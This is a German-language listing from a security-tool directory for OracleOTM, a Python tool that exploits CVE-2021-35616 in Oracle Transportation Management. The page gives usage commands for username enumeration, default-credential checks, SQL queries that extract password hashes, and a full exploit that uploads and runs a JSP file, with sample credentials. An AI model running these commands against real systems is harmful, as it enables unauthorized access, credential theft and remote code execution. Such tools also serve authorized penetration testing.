Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OracleOTM — Python-Tool zum Ausnutzen von CVE-2021-35616 | Kitploit
Tools/GitHubGitHub/ofirhamam/oracleotm
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubofirhamam/oracleotm

OracleOTM

Python-Tool zum Ausnutzen von CVE-2021-35616

Repository anzeigen
111vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OracleOTM

Python-Tool zur Ausnutzung von CVE-2021-35616

Das Skript arbeitet in Modulen, die ich in der folgenden Reihenfolge implementiert habe:

► Benutzernamen-Enumeration

► Suche nach Standard-Anmeldedaten

► Ausführen einer SQL-Abfrage mit dem DBXML-Servlet

► Vollständige Ausnutzung und JSP-Ausführung

Die Syntax des Skripts lautet wie folgt:

.\OracleOTM.py {module} {host TXT file} {additional parameters}

Benutzernamen-Enumeration: .\OracleOTM.py enum {hosts TXT file} -u users.txt

Suche nach Standard-Anmeldedaten: .\OracleOTM.py default {hosts TXT file}

Ausführen einer SQL-Abfrage mit dem DBXML-Servlet: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

Ich habe auch einige vordefinierte Abfragen vorbereitet, die ich nützlich fand; Sie können wie folgt direkt darauf zugreifen:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os

root@kitploit:~
OS – Extrahiert das Betriebssystem des Servers 

Osuser – Extrahiert den OS-Benutzer, der die DB ausführt

Hostname – Hostname des DB-Servers 

Hostip – IP-Adresse des DB-Servers 

Passwords – Extrahiert die OTM-Benutzer und ihre gehashten Passwörter

 Oraversion – Die DB-Version 

Dbusershash – Die Passwort-Hashes der DB-Benutzer

Dbfileslocation – Der Speicherort der DB-Dateien im Betriebssystem

Vollständige Ausnutzung und JSP-Ausführung: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"

Tool herunterladen